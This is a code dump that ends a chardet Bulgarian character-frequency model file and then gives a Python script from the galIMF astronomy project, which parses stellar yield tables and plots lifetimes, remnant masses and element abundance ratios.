0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
)
Latin5BulgarianModel = {
'charToOrderMap': Latin5_BulgarianCharToOrderMap,
'precedenceMatrix': BulgarianLangModel,
'mTypicalPositiveRatio': 0.969392,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-5"
}
Win1251BulgarianModel = {
'charToOrderMap': win1251BulgarianCharToOrderMap,
'precedenceMatrix': BulgarianLangModel,
'mTypicalPositiveRatio': 0.969392,
'keepEnglishLetter': False,
'charsetName': "windows-1251"
}
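# Hedged sketch, not part of the original module: BulgarianLangModel above is a
# flattened 64x64 matrix of bigram likelihood classes (0-3). Assuming chardet's
# SingleByteCharSetProber convention of indexing by previous_order * 64 +
# current_order:
def _example_bigram_likelihood(previous_order, current_order):
    SAMPLE_SIZE = 64  # assumption matching the 4096-entry table above
    if previous_order < SAMPLE_SIZE and current_order < SAMPLE_SIZE:
        return BulgarianLangModel[previous_order * SAMPLE_SIZE + current_order]
    return None  # orders >= 64 are too rare to be modelled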
# flake8: noqa
| mit |
Azeret/galIMF | plot_stellar_yield_table.py | 1 | 38495 | import time
import math
import matplotlib.pyplot as plt
import numpy as np
from scipy import interpolate
import element_abundances_solar
reference_name = 'Anders1989'
H_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'H')
# He_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'He')
C_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'C')
# N_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'N')
O_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'O')
Mg_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'Mg')
Fe_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'Fe')
Si_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'Si')
Ca_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'Ca')
def plot_lifetime_and_finalmass():
Z2_list = [0.0004, 0.004, 0.008, 0.012]
file = open('yield_tables/rearranged/setllar_final_mass_from_portinari98/portinari98_Z=0.004.txt', 'r')
data = file.readlines()
file.close()
list2 = str.split(data[3])
list_ini_mass = []
for j in list2:
list_ini_mass.append(math.log(float(j), 10))
list_fin_mass = []
i = len(Z2_list) - 1
while i > -1:
file = open('yield_tables/rearranged/setllar_final_mass_from_portinari98/portinari98_Z={}.txt'.format(Z2_list[i]), 'r')
data = file.readlines()
file.close()
list2 = str.split(data[5])
list3 = []
for j in list2:
list3.append(math.log(float(j), 10))
list = [float(data[1]), list3]
list_fin_mass.append(list)
(i) = (i - 1)
color_list_ = []
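    # Map [Z] = log10(Z / Z_sun), clipped to [-6, 1], onto a 0-1000 colormap
    # index; the 4.001 exponent compresses the metal-poor end of the scale.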
for i in range(len(list_fin_mass)):
ZZZ = list_fin_mass[i][0]
Z_box = math.log(ZZZ, 10) - math.log(0.01886, 10)
color_list_.append(round(((Z_box+7)**4.001 - (-6.001 + 7) ** 4.001) / ((1 + 7) ** 4.001 - (-6.001 + 7) ** 4.001) * 1000))
colors = plt.cm.hsv_r(np.linspace(0, 1, 1000))
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(21, figsize=(4, 3.5))
# plt.xlim(-1.5, 2.5)
# plt.ylim(-1.5, 1.5)
# i = len(Z2_list) - 1
# while i > -1:
# plt.plot(list_ini_mass, list_fin_mass[i][1], label='Z={}'.format(list_fin_mass[i][0]))
# (i) = (i - 1)
# plt.plot([-2, 3], [-2, 3], ls='dashed', c='k', lw=0.7)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$ [$M_\odot$])')
# plt.ylabel(r'log$_{10}$($M_{\rm *, final}$ [$M_\odot$])')
# plt.tight_layout()
# plt.savefig('Interpolated_stellar_final_mass.pdf', dpi=250)
list_lifetime = []
i = len(Z2_list) - 1
while i > -1:
file = open(
'yield_tables/rearranged/setllar_lifetime_from_portinari98/portinari98_Z={}.txt'.format(Z2_list[i]), 'r')
data = file.readlines()
file.close()
list2 = str.split(data[5])
list3 = []
for j in list2:
list3.append(math.log(float(j), 10))
list = [float(data[1]), list3]
list_lifetime.append(list)
(i) = (i - 1)
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(22, figsize=(4, 3.5))
# plt.xlim(-1.5, 2.5)
# plt.ylim(6, 15)
# i = len(Z2_list) - 1
# while i > -1:
# plt.plot(list_ini_mass, list_lifetime[i][1], label='Z={}'.format(list_fin_mass[i][0]))
# (i) = (i - 1)
# # plt.plot([-2, 3], [-2, 3], ls='dashed', c='k', lw=0.7)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$ [$M_\odot$])')
# plt.ylabel(r'log$_{10}$(life time [yr])')
# plt.tight_layout()
# plt.savefig('Interpolated_stellar_lifetime.pdf', dpi=250)
##########
Metallicity_origen = [0.008, 0.02]
Age_origen = [
[6.47E+10, 3.54E+10, 2.09E+10, 1.30E+10, 8.46E+09, 5.72E+09, 4.12E+09, 2.92E+09, 2.36E+09, 2.18E+09, 1.82E+09,
1.58E+09, 1.41E+09, 1.25E+09, 1.23E+09, 6.86E+08, 4.12E+08, 1.93E+08, 1.15E+08, 7.71E+07, 5.59E+07, 3.44E+07,
2.10E+07, 1.49E+07, 1.01E+07, 6.65E+06, 5.30E+06, 4.15E+06, 3.44E+06, 3.32E+06],
[7.92E+10, 4.45E+10, 2.61E+10, 1.59E+10, 1.03E+10, 6.89E+09, 4.73E+09, 3.59E+09, 2.87E+09, 2.64E+09, 2.18E+09,
1.84E+09, 1.59E+09, 1.38E+09, 1.21E+09, 7.64E+08, 4.56E+08, 2.03E+08, 1.15E+08, 7.45E+07, 5.31E+07, 3.17E+07,
1.89E+07, 1.33E+07, 9.15E+06, 6.13E+06, 5.12E+06, 4.12E+06, 3.39E+06, 3.23E+06]]
Age_012 = []
for i in range(len(Age_origen[0])):
Age_012.append((Age_origen[0][i]*2+Age_origen[1][i])/3)
Remnant_mass_origen = [
[1.35, 1.48, 1.84, 2.04, 6.9, 12.5, 5.69, 9.89],
[1.31, 1.44, 1.87, 2.11, 7.18, 2.06, 2.09, 2.11]
]
Remnant_mass_012 = []
for i in range(len(Remnant_mass_origen[0])):
Remnant_mass_012.append((Remnant_mass_origen[0][i]*2+Remnant_mass_origen[1][i])/3)
Mass = [0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5,
1.6, 1.7, 1.8, 1.9, 2.0, 2.5, 3.0, 4.0, 5.0, 6.0,
7.0, 9.0, 12., 15., 20., 30., 40., 60., 100, 120]
    Metallicity = [0.0004, 0.004, 0.008, 0.012]
Age = [
[4.28E+10, 2.37E+10, 1.41E+10, 8.97E+09, 6.03E+09, 4.23E+09, 3.08E+09, 2.34E+09, 1.92E+09, 1.66E+09, 1.39E+09,
1.18E+09, 1.11E+09, 9.66E+08, 8.33E+08, 4.64E+08, 3.03E+08, 1.61E+08, 1.01E+08, 7.15E+07, 5.33E+07, 3.42E+07,
2.13E+07, 1.54E+07, 1.06E+07, 6.90E+06, 5.45E+06, 4.20E+06, 3.32E+06, 3.11E+06],
[5.35E+10, 2.95E+10, 1.73E+10, 1.09E+10, 7.13E+09, 4.93E+09, 3.52E+09, 2.64E+09, 2.39E+09, 1.95E+09, 1.63E+09,
1.28E+09, 1.25E+09, 1.23E+09, 1.08E+09, 5.98E+08, 3.67E+08, 1.82E+08, 1.11E+08, 7.62E+07, 5.61E+07, 3.51E+07,
2.14E+07, 1.52E+07, 1.05E+07, 6.85E+06, 5.44E+06, 4.19E+06, 3.38E+06, 3.23E+06],
[6.47E+10, 3.54E+10, 2.09E+10, 1.30E+10, 8.46E+09, 5.72E+09, 4.12E+09, 2.92E+09, 2.36E+09, 2.18E+09, 1.82E+09,
1.58E+09, 1.41E+09, 1.25E+09, 1.23E+09, 6.86E+08, 4.12E+08, 1.93E+08, 1.15E+08, 7.71E+07, 5.59E+07, 3.44E+07,
2.10E+07, 1.49E+07, 1.01E+07, 6.65E+06, 5.30E+06, 4.15E+06, 3.44E+06, 3.32E+06],
Age_012]
len_mass = len(Mass)
log_Mass = []
for i in range(len_mass):
log_Mass.append(math.log(Mass[i], 10))
len_metal = len(Metallicity)
log_Metallicity = []
for i in range(len_metal):
log_Metallicity.append(math.log(Metallicity[i], 10))
log_Age = []
for i in range(len_metal):
log_Age.append([])
for j in range(len_mass):
log_Age[i].append(math.log(Age[i][j], 10))
fig, axs = plt.subplots(2, 1, sharex=True, figsize=(4, 4))
i = 0
while i < len(Z2_list):
ZZZ = list_fin_mass[i][0]
Z_box = round(math.log(ZZZ, 10)-math.log(0.01886, 10), 2)
axs[0].plot(list_ini_mass, list_lifetime[i][1], lw=(6-i)/2, label='Z={}, [Z]={}'.format(ZZZ, Z_box), color=colors[color_list_[i]])
(i) = (i + 1)
i = len_metal-1
# while i > -1:
# axs[0].scatter(log_Mass, log_Age[i], s=3, marker='*', edgecolors='w', linewidth='0.1', zorder=10)
# (i) = (i - 1)
axs[0].plot([-1, 2], [7, 7])
axs[0].plot([math.log(17, 10), math.log(17, 10)], [6, 15])
# axs[0].set_yticks(np.arange(6, 16, 2))
axs[0].set_ylim(6, 15)
axs[0].set_ylabel(r'log$_{10}$(life time [yr])')
axs[0].legend(prop={'size': 6}, loc='best')
Mass = [
[9, 12, 15, 20, 30, 40, 60, 100, 120],
[9, 12, 15, 20, 30, 40, 100, 120],
[9, 12, 15, 20, 30, 40, 60, 120],
[9, 12, 15, 20, 30, 40, 60, 120]
]
    Metallicity = [0.0004, 0.004, 0.008, 0.012]
Remnant_mass = [
[1.35, 1.5, 1.8, 2.07, 6.98, 14.91, 24.58, 32.06, 30.6],
[1.35, 1.5, 1.82, 2.04, 6.98, 12.6, 36.7, 35.2],
[1.35, 1.48, 1.84, 2.04, 6.9, 12.5, 5.69, 9.89],
Remnant_mass_012
]
#################################################################
# WW95_solar = 0.01886
# Metallicity_WW95 = [0, WW95_solar*10**-4, WW95_solar*0.01, WW95_solar*0.1, WW95_solar]
# Mass_WW95 = [12, 13, 15, 18, 20, 22, 25, 30, 35, 40]
# Remnant_mass_WW95_B = [
# [1.32, 1.46, 1.43, 1.76, 2.06, 2.02, 2.07, 1.94, 3.86, 5.45],
# [1.38, 1.31, 1.49, 1.69, 1.97, 2.12, 1.99, 2.01, 3.39, 4.45],
# [1.40, 1.44, 1.56, 1.58, 1.98, 2.04, 1.87, 2.21, 2.42, 4.42],
# [1.28, 1.44, 1.63, 1.61, 1.97, 2.01, 1.87, 2.08, 3.03, 4.09],
# [1.35, 1.28, 1.53, 3.40, 4.12, 1.49, 1.90, 1.54, 7.62, 12.2]
# ]
# Interpolation_remnant_mass_WW95_B = interpolate.interp2d(Mass_WW95, Metallicity_WW95, Remnant_mass_WW95_B)
# Remnant_mass_WW95_B_new = []
# for i in range(len(Metallicity)):
# Remnant_mass_WW95_B_new.append([])
# for j in range(len(Mass_WW95)):
# Remnant_mass_WW95_B_new[i].append(Interpolation_remnant_mass_WW95_B(Mass_WW95[j], Metallicity[i]))
#
# log_Remnant_mass_WW95_B = []
# for i in range(len_metal):
# log_Remnant_mass_WW95_B.append([])
# for j in range(len(Remnant_mass_WW95_B[i])):
# log_Remnant_mass_WW95_B[i].append(math.log(Remnant_mass_WW95_B[i][j], 10))
#
# log_mass_WW95 = []
# for i in range(len(Mass_WW95)):
# log_mass_WW95.append(math.log(Mass_WW95[i], 10))
#################################################################
len_metal = len(Metallicity)
log_Metallicity = []
for i in range(len_metal):
log_Metallicity.append(math.log(Metallicity[i], 10))
log_Remnant_mass = []
for i in range(len_metal):
log_Remnant_mass.append([])
for j in range(len(Remnant_mass[i])):
log_Remnant_mass[i].append(math.log(Remnant_mass[i][j], 10))
log_mass = []
for i in range(len_metal):
log_mass.append([])
for j in range(len(Mass[i])):
log_mass[i].append(math.log(Mass[i][j], 10))
# print(log_mass)
# print(len(log_mass[0]))
# print(len(log_mass))
# print(len(log_Remnant_mass[0]))
i = 0
while i < len(Z2_list):
axs[1].plot(list_ini_mass, list_fin_mass[i][1], lw=(6-i)/2, label='Z={}'.format(list_fin_mass[i][0]), color=colors[color_list_[i]])
(i) = (i + 1)
i = len_metal-1
# while i > -1:
# axs[1].scatter(log_mass[i], log_Remnant_mass[i], s=10, marker='*', edgecolors='w', linewidth='0.1', zorder=10)
# (i) = (i - 1)
# i = len_metal-1
# # while i > -1:
# # axs[1].scatter(log_mass_WW95, log_Remnant_mass_WW95_B[i], s=10, marker='^', edgecolors='w', linewidth='0.1', zorder=10)
# # (i) = (i - 1)
axs[1].set_yticks(np.arange(-2, 2, 1))
axs[1].set_ylim(-1.5, 1.5)
axs[1].set_ylabel(r'log$_{10}(M_{\rm *, final}$ [$M_\odot$])')
axs[1].set_xlabel(r'log$_{10}(M_{\rm *, initial}$ [$M_\odot$])')
plt.tight_layout()
# Remove horizontal space between axes
fig.subplots_adjust(hspace=0)
plt.savefig('Interpolated_stellar_lifetime_final_mass.pdf', dpi=250)
plt.show()
return
def function_read_file(yield_table_name):
####################
### read in file ###
####################
if yield_table_name == "portinari98":
file_yield = open(
'yield_tables/agb_and_massive_stars_portinari98_marigo01_gce_totalyields.txt', 'r')
# 'yield_tables/agb_and_massive_stars_portinari98_marigo01.txt', 'r')
# Use net yields of Portinari and Marigo
# Net yields with masses up to 7Msun are from Marigo, above those of Portinari are taken.
# Only isotopes are selected which are available in both yield sets and go up to Fe.
# Initial masses go from the lowest mass available up to 100Msun.
# Yield set ID M01P98 in Ritter et al. 2017.
# References: Marigo et al. 2001, http://ukads.nottingham.ac.uk/abs/2001A%26A...370..194M
# Portinari et al. 1998, http://ukads.nottingham.ac.uk/abs/1998A%26A...334..505P
data = file_yield.readlines()
file_yield.close()
elif yield_table_name == "Kobayashi06":
file_yield = open(
'yield_tables/agb_and_massive_stars_Kobayashi06_marigo01_gce_totalyields.txt', 'r')
# Use net yields of Woosley S. E., Weaver T. A., 1995, ApJS, 101, 181 (WW95)
# Use WW95 model B which has the highest [Mg/Fe].
data = file_yield.readlines()
file_yield.close()
elif yield_table_name == "WW95":
file_yield = open(
'yield_tables/massive_stars_WW95_totalyields.txt', 'r')
# Use net yields of Woosley S. E., Weaver T. A., 1995, ApJS, 101, 181 (WW95)
# Use WW95 model B which has the highest [Mg/Fe].
data = file_yield.readlines()
file_yield.close()
elif yield_table_name == "marigo01":
file_yield = open(
'yield_tables/agb_marigo01_totalyields.txt', 'r')
data = file_yield.readlines()
file_yield.close()
###########################
### extract information ###
###########################
#
H_relative_line_number = function_get_element_line_number(data, 'H-1')
He_relative_line_number = function_get_element_line_number(data, 'He-4')
C_relative_line_number = function_get_element_line_number(data, 'C-12')
N_relative_line_number = function_get_element_line_number(data, 'N-14')
O_relative_line_number = function_get_element_line_number(data, 'O-16')
Ne_relative_line_number = function_get_element_line_number(data, 'Ne-20')
Mg_relative_line_number = function_get_element_line_number(data, 'Mg-24')
Si_relative_line_number = function_get_element_line_number(data, 'Si-28')
S_relative_line_number = function_get_element_line_number(data, 'S-32')
Ca_relative_line_number = function_get_element_line_number(data, 'Ca-40')
Fe_relative_line_number = function_get_element_line_number(data, 'Fe-56')
#
global M_list, Z_list, eject_mass_list, H_eject_mass_list, He_eject_mass_list, C_eject_mass_list, \
N_eject_mass_list, O_eject_mass_list, Ne_eject_mass_list, Mg_eject_mass_list, Si_eject_mass_list, \
S_eject_mass_list, Ca_eject_mass_list, Fe_eject_mass_list, Metal_eject_mass_list
global O_over_Mg_list, Mg_over_Fe_list, Ca_over_Fe_list, Si_over_Fe_list, C_over_H_list, Mg_over_H_list, \
Si_over_H_list, Fe_over_H_list, O_over_H_list, Z_over_H_list, \
Z_over_X_list, Z_over_Z0_list, XXX_list, YYY_list, ZZZ_list, O_over_Fe_list
#
i = len(data)-1
while i > -1:
line_i = str.split(data[i])
if line_i[1] == 'Table:':
line_H = str.split(data[i + H_relative_line_number])
line_He = str.split(data[i + He_relative_line_number])
line_C = str.split(data[i + C_relative_line_number])
line_N = str.split(data[i + N_relative_line_number])
line_O = str.split(data[i + O_relative_line_number])
line_Ne = str.split(data[i + Ne_relative_line_number])
line_Mg = str.split(data[i + Mg_relative_line_number])
line_Si = str.split(data[i + Si_relative_line_number])
line_S = str.split(data[i + S_relative_line_number])
line_Ca = str.split(data[i + Ca_relative_line_number])
line_Fe = str.split(data[i + Fe_relative_line_number])
line_Mfinal = str.split(data[i + 2])
(Z, M) = function_get_Z_M(line_i[2]) # metallicity and mass of the star
ejecta_mass = round((M - function_get_Mfinal(line_Mfinal[2])), 5) ####################
H_mass = function_get_element_mass(line_H[1])
He_mass = function_get_element_mass(line_He[1])
C_mass = function_get_element_mass(line_C[1])
N_mass = function_get_element_mass(line_N[1])
O_mass = function_get_element_mass(line_O[1])
Ne_mass = function_get_element_mass(line_Ne[1])
Mg_mass = function_get_element_mass(line_Mg[1])
Si_mass = function_get_element_mass(line_Si[1])
S_mass = function_get_element_mass(line_S[1])
Ca_mass = function_get_element_mass(line_Ca[1])
Fe_mass = function_get_element_mass(line_Fe[1])
H_num = H_mass/1.0079
C_num = C_mass/12.011
N_num = N_mass/14.007
O_num = O_mass/15.9994
Ne_num = Ne_mass/20.18
Mg_num = Mg_mass/24.305
Si_num = Si_mass/28.085
S_num = S_mass/32.06
Ca_num = Ca_mass/40.078
Fe_num = Fe_mass/55.845
Metal_num = C_num+N_num+O_num+Ne_num+Mg_num+Si_num+S_num+Ca_num+Fe_num
O_over_Mg = math.log(O_num/Mg_num, 10) - O_abundances_solar + Mg_abundances_solar
Mg_over_H = math.log(Mg_num/H_num, 10) - Mg_abundances_solar + H_abundances_solar
Si_over_H = math.log(Si_num/H_num, 10) - Si_abundances_solar + H_abundances_solar
C_over_H = math.log(C_num/H_num, 10) - C_abundances_solar + H_abundances_solar
Fe_over_H = math.log(Fe_num/H_num, 10) - Fe_abundances_solar + H_abundances_solar
O_over_H = math.log(O_num/H_num, 10) - O_abundances_solar + H_abundances_solar
Mg_over_Fe = math.log(Mg_num/Fe_num, 10) - Mg_abundances_solar + Fe_abundances_solar
Ca_over_Fe = math.log(Ca_num/Fe_num, 10) - Ca_abundances_solar + Fe_abundances_solar
Si_over_Fe = math.log(Si_num/Fe_num, 10) - Si_abundances_solar + Fe_abundances_solar
O_over_Fe = math.log(O_num/Fe_num, 10) - O_abundances_solar + Fe_abundances_solar
Metal_mass = round((ejecta_mass - H_mass - He_mass), 5) ####################
# Metal_mass = round((C_mass+N_mass+O_mass+Ne_mass+Mg_mass+Si_mass+S_mass+Ca_mass+Fe_mass), 5) ###### the same ######
if Metal_mass<0:
print("Warning: Metal_mass=", Metal_mass, "<0")
print("check stellar yield table with metallicity and mass being:", Z, "&", M)
Metal_mass = 0
Z_over_X = math.log(Metal_mass / H_mass, 10) - math.log(0.01886 / 0.7381, 10)
Z_over_Z0 = math.log(Metal_mass / ejecta_mass, 10) - math.log(0.01886, 10)
Z_over_H = math.log(Metal_num / H_num, 10) - math.log(0.01886 / 18 / 0.7381, 10) # where 18 is the estimated average atomic weight over the weight of hydrogen.
XXX = H_mass / ejecta_mass
YYY = He_mass / ejecta_mass
ZZZ = Metal_mass / ejecta_mass
if len(Z_list) == 0:
Z_list.append(Z)
Z_n = 0
M_list.append([])
eject_mass_list.append([])
H_eject_mass_list.append([])
He_eject_mass_list.append([])
C_eject_mass_list.append([])
N_eject_mass_list.append([])
O_eject_mass_list.append([])
Ne_eject_mass_list.append([])
Mg_eject_mass_list.append([])
Si_eject_mass_list.append([])
S_eject_mass_list.append([])
Ca_eject_mass_list.append([])
Fe_eject_mass_list.append([])
Metal_eject_mass_list.append([])
Z_over_H_list.append([])
Z_over_X_list.append([])
Z_over_Z0_list.append([])
XXX_list.append([])
YYY_list.append([])
ZZZ_list.append([])
O_over_Mg_list.append([])
Mg_over_Fe_list.append([])
Si_over_Fe_list.append([])
Ca_over_Fe_list.append([])
Mg_over_H_list.append([])
Si_over_H_list.append([])
C_over_H_list.append([])
Fe_over_H_list.append([])
O_over_H_list.append([])
O_over_Fe_list.append([])
if Z != Z_list[-1]:
Z_list.append(Z)
Z_n += 1
M_list.append([])
eject_mass_list.append([])
H_eject_mass_list.append([])
He_eject_mass_list.append([])
C_eject_mass_list.append([])
N_eject_mass_list.append([])
O_eject_mass_list.append([])
Ne_eject_mass_list.append([])
Mg_eject_mass_list.append([])
Si_eject_mass_list.append([])
S_eject_mass_list.append([])
Ca_eject_mass_list.append([])
Fe_eject_mass_list.append([])
Metal_eject_mass_list.append([])
O_over_Mg_list.append([])
Mg_over_Fe_list.append([])
Ca_over_Fe_list.append([])
Si_over_Fe_list.append([])
Mg_over_H_list.append([])
Si_over_H_list.append([])
C_over_H_list.append([])
Fe_over_H_list.append([])
O_over_H_list.append([])
Z_over_H_list.append([])
Z_over_X_list.append([])
Z_over_Z0_list.append([])
XXX_list.append([])
YYY_list.append([])
ZZZ_list.append([])
O_over_Fe_list.append([])
M_list[Z_n].append(M)
eject_mass_list[Z_n].append(ejecta_mass)
H_eject_mass_list[Z_n].append(H_mass)
He_eject_mass_list[Z_n].append(He_mass)
C_eject_mass_list[Z_n].append(C_mass)
N_eject_mass_list[Z_n].append(N_mass)
O_eject_mass_list[Z_n].append(O_mass)
Ne_eject_mass_list[Z_n].append(Ne_mass)
Mg_eject_mass_list[Z_n].append(Mg_mass)
Si_eject_mass_list[Z_n].append(Si_mass)
S_eject_mass_list[Z_n].append(S_mass)
Ca_eject_mass_list[Z_n].append(Ca_mass)
Fe_eject_mass_list[Z_n].append(Fe_mass)
Metal_eject_mass_list[Z_n].append(Metal_mass)
O_over_Mg_list[Z_n].append(O_over_Mg)
Mg_over_Fe_list[Z_n].append(Mg_over_Fe)
Ca_over_Fe_list[Z_n].append(Ca_over_Fe)
Si_over_Fe_list[Z_n].append(Si_over_Fe)
Mg_over_H_list[Z_n].append(Mg_over_H)
Si_over_H_list[Z_n].append(Si_over_H)
C_over_H_list[Z_n].append(C_over_H)
O_over_H_list[Z_n].append(O_over_H)
Z_over_H_list[Z_n].append(Z_over_H)
Z_over_X_list[Z_n].append(Z_over_X)
Z_over_Z0_list[Z_n].append(Z_over_Z0)
XXX_list[Z_n].append(XXX)
YYY_list[Z_n].append(YYY)
ZZZ_list[Z_n].append(ZZZ)
Fe_over_H_list[Z_n].append(Fe_over_H)
O_over_Fe_list[Z_n].append(O_over_Fe)
(i) = (i - 1)
return
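def _bracket_ratio_sketch(num_x, num_y, solar_x, solar_y):
    # Hedged helper, not part of the original script: the [X/Y] bracket
    # notation computed repeatedly in function_read_file above,
    #   [X/Y] = log10(N_X / N_Y) - (log_eps_X - log_eps_Y),
    # with the solar log-abundances taken from element_abundances_solar.
    return math.log(num_x / num_y, 10) - solar_x + solar_y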
def function_get_Mfinal(Mfinal_string):
i_end = len(Mfinal_string)
i = 0
mass_str = ''
while i < i_end:
mass_str += Mfinal_string[i]
(i) = (i + 1)
mass = float(mass_str)
return mass
def function_get_element_mass(element_mass_string):
i_end = len(element_mass_string)
i = 1
mass_str = ''
while i < i_end:
mass_str += element_mass_string[i]
(i) = (i + 1)
mass = float(mass_str)
return mass
def function_get_element_line_number(data, element):
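    # Computes, from the first "Table:" block, the line offset of the
    # "&<element>" row relative to the header; the same layout repeats for
    # every (Z, M) block, so one offset serves them all.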
i = 0
while i < len(data):
line_i = str.split(data[i])
if line_i[1] == 'Table:':
start = i
j = 0
while j < 100:
line_j = str.split(data[j])
if line_j[0] == '&'+element:
end = j
element_relative_line_number = j - i
break
(j) = (j+1)
break
(i) = (i + 1)
return element_relative_line_number
def function_get_Z_M(M_Z_string):
i = 0
i_M_start = 0
i_M_end = 0
i_Z_start = 0
i_Z_end = 0
while i < len(M_Z_string):
if M_Z_string[i] == 'M':
i_M_start = i+2
if M_Z_string[i] == ',':
i_M_end = i
i_Z_start = i+3
if M_Z_string[i] == ')':
i_Z_end = i
(i) = (i+1)
i = i_Z_start
Z_str = ''
while i < i_Z_end:
Z_str += M_Z_string[i]
(i) = (i + 1)
Z = float(Z_str)
i = i_M_start
M_str = ''
while i < i_M_end:
M_str += M_Z_string[i]
(i) = (i + 1)
M = float(M_str)
return (Z, M)
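def _example_parse_header():
    # Illustrative check, not part of the original script: function_get_Z_M
    # parses headers of the form "(M=<mass>,Z=<metallicity>)"; the sample
    # string is an assumption based on the delimiters the parser looks for.
    assert function_get_Z_M('(M=12.0,Z=0.004)') == (0.004, 12.0)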
def function_plot_yields():
global O_over_Mg_list, Mg_over_Fe_list, C_over_H_list, Mg_over_H_list, Si_over_H_list, Fe_over_H_list, O_over_H_list, Z_over_X_list, Z_over_Z0_list, \
Z_over_H_list, O_over_Fe_list, M_list, Z_list, XXX_list, YYY_list, ZZZ_list
color_list_ = []
for i in range(len(Z_list)):
ZZZ = Z_list[i]
if ZZZ > 0:
Z_box = math.log(ZZZ, 10) - math.log(0.01886, 10)
else:
Z_box = -6
color_list_.append(round(((Z_box+7)**4.001 - (-6.001 + 7) ** 4.001) / ((1 + 7) ** 4.001 - (-6.001 + 7) ** 4.001) * 1000))
colors = plt.cm.hsv_r(np.linspace(0, 1, 1000))
j = 0
while j < len(M_list):
i = 0
while i < len(M_list[j]):
M_list[j][i] = math.log(M_list[j][i], 10)
(i) = (i+1)
(j) = (j+1)
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(1, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# # plt.ylim(0, 2)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], O_over_Mg_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# O_mass_eject_SNIa = 0.148 # TNH93 0.148 i99CDD1 0.09, i99CDD2 0.06, i99W7 0.14, ivo12/13 0.09-0.1, t03 0.14, t86 0.13
# Mg_mass_eject_SNIa = 0.009 # TNH93 0.009 i99CDD1 0.0077, i99CDD2 0.0042, i99W7 0.0085, ivo12/13 0.015-0.029, t03 0.013, t86 0.016
# O_num = O_mass_eject_SNIa / 15.9994
# Mg_num = Mg_mass_eject_SNIa / 24.305
# O_over_Mg_SNIa = math.log(O_num / Mg_num, 10) - O_abundances_solar + Mg_abundances_solar
# plt.plot([-0.3, 0.9], [O_over_Mg_SNIa, O_over_Mg_SNIa], ls="--", lw=2, label="SNIa")
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[O/Mg]')
# plt.tight_layout()
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(2, figsize=(4, 3.5))
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], Mg_over_Fe_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
    Mg_mass_eject_SNIa = 0.0158  # SNIa Mg yield adopted here (model-dependent; see the Fe comment below for the model abbreviations)
    Fe_mass_eject_SNIa = 0.68  # 0.63 # Recchi2009 halved to 0.372 # TNH93 0.744 i99CDD1 0.56, i99CDD2 0.76, i99W7 0.63, ivo12/13 0.62-0.67, t03 0.74, t86 0.63
Ca_mass_eject_SNIa = 0.0181
Si_mass_eject_SNIa = 0.142
Ca_num = Ca_mass_eject_SNIa / 40.078
Si_num = Si_mass_eject_SNIa / 28.085
Mg_num = Mg_mass_eject_SNIa / 24.305
Fe_num = Fe_mass_eject_SNIa / 55.845
Mg_over_Fe_SNIa = math.log(Mg_num / Fe_num, 10) - Mg_abundances_solar + Fe_abundances_solar
Si_over_Fe_SNIa = math.log(Si_num / Fe_num, 10) - Si_abundances_solar + Fe_abundances_solar
Ca_over_Fe_SNIa = math.log(Ca_num / Fe_num, 10) - Ca_abundances_solar + Fe_abundances_solar
# plt.plot([-0.3, 0.9], [Mg_over_Fe_SNIa, Mg_over_Fe_SNIa], ls="--", lw=2, label="SNIa")
# plt.plot([-2, 3], [0, 0], lw=0.5, ls='dotted')
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 3.5)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$ [$M_\odot$])')
# plt.ylabel(r'[Mg/Fe]')
# plt.tight_layout()
# plt.savefig('steller_yield_Mg_over_Fe.pdf', dpi=250)
#
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(3, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 7)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], O_over_Fe_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# O_over_Fe_SNIa = math.log(O_num / Fe_num, 10) - O_abundances_solar + Fe_abundances_solar
# plt.plot([-0.3, 0.9], [O_over_Fe_SNIa, O_over_Fe_SNIa], ls="--", lw=2, label="SNIa")
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[O/Fe]')
# plt.tight_layout()
# #
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(4, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
